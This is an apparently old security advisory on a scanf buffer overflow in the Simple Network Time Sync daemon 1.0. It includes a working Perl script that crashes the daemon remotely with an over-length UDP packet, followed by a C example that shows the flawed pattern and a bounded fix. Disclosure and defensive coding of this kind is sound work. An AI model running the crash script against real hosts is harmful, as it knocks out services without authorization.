Vulnerability

    Simple Network Time Sync

Affected

    Simple Network Time Sync

Description

    'logistix' found the following. He noticed an uncommon scanf overflow in the Simple Network Time Sync daemon and client version 1.0, tested on Redhat 6.1. He hasn't looked into this fully yet, but it looks as though it could be root compromising, as it sits on a privileged UDP port and seems to core dump, but it looks like it only gives you 50 chars to run code with. He included some Perl here which will crash it remotely by sending it a string over 50 chars.

    #!/usr/bin/perl -w
    #
    # Usage: ./kill_sntsd <hostname>
    #

    use Socket;

    send_packet();    # Needs to send 2 packets to kill the client and the server daemons
    send_packet();

    sub send_packet {
        $proto = getprotobyname('udp');
        $localaddr = gethostbyname("localhost") || die "error: $! \n";
        $iaddr = gethostbyname($ARGV[0]) || die "$!\n";
        $sin = sockaddr_in(724, $iaddr);
        $paddr = sockaddr_in(53, $localaddr);
        socket(SH, PF_INET, SOCK_DGRAM, $proto);
        bind(SH, $paddr);
        $|=1;
        connect(SH, $sin) || die "$!\n";
        # A string longer than 50 characters...
        print SH "logistixlogistixlogistixlogistixlogistixlogistixlogistix \n";
        close(SH);
    }

Solution

    Nothing yet.
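
The bug class described above (a scanf-family conversion with no field width writing into a 50-byte buffer) and a bounded replacement, as an added example that is not the Simple Network Time Sync source. The name parse_field, the FIELD_MAX constant and the one-token payload layout are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define FIELD_MAX 50   /* assumed buffer size, from the advisory's "over 50 chars" */

/* Overflowing pattern: %s has no width, so a token longer than 49 bytes
 * is written past the end of field[].
 *     char field[FIELD_MAX];
 *     sscanf(datagram, "%s", field);
 */

/* Bounded parse of one whitespace-delimited token from a UDP payload.
 * Returns 0 on success, -1 if the payload is empty, oversize, or holds a
 * token that does not fit. out[] is always left NUL-terminated. */
int parse_field(const char *pkt, size_t len, char out[FIELD_MAX])
{
    char copy[FIELD_MAX + 2];    /* token + one delimiter + NUL */
    int consumed = 0;
    char next;

    out[0] = '\0';
    if (len == 0 || len > sizeof(copy) - 1)
        return -1;               /* drop oversize datagrams, do not truncate */
    memcpy(copy, pkt, len);      /* payloads are not NUL-terminated */
    copy[len] = '\0';

    /* %49s caps the write at 49 bytes plus the terminator;
       %n records how many input bytes the conversion consumed. */
    if (sscanf(copy, "%49s%n", out, &consumed) != 1)
        return -1;
    next = copy[consumed];       /* must be whitespace or the final NUL */
    if (strchr(" \t\r\n", next) == NULL) {
        out[0] = '\0';           /* token was cut at 49 bytes: reject it */
        return -1;
    }
    return 0;
}

int main(void)
{
    /* Constructed sample payloads: a short token, and the over-length string
       the advisory's script sends. */
    const char ok[]  = "12:00:00\n";
    const char big[] = "logistixlogistixlogistixlogistixlogistixlogistixlogistix \n";
    char out[FIELD_MAX];
    printf("short: %d\n", parse_field(ok, sizeof(ok) - 1, out));
    printf("long:  %d\n", parse_field(big, sizeof(big) - 1, out));
    return 0;
}
```

Rejecting the over-length token outright, rather than silently truncating it, also gives the daemon a clean point at which to log the sender.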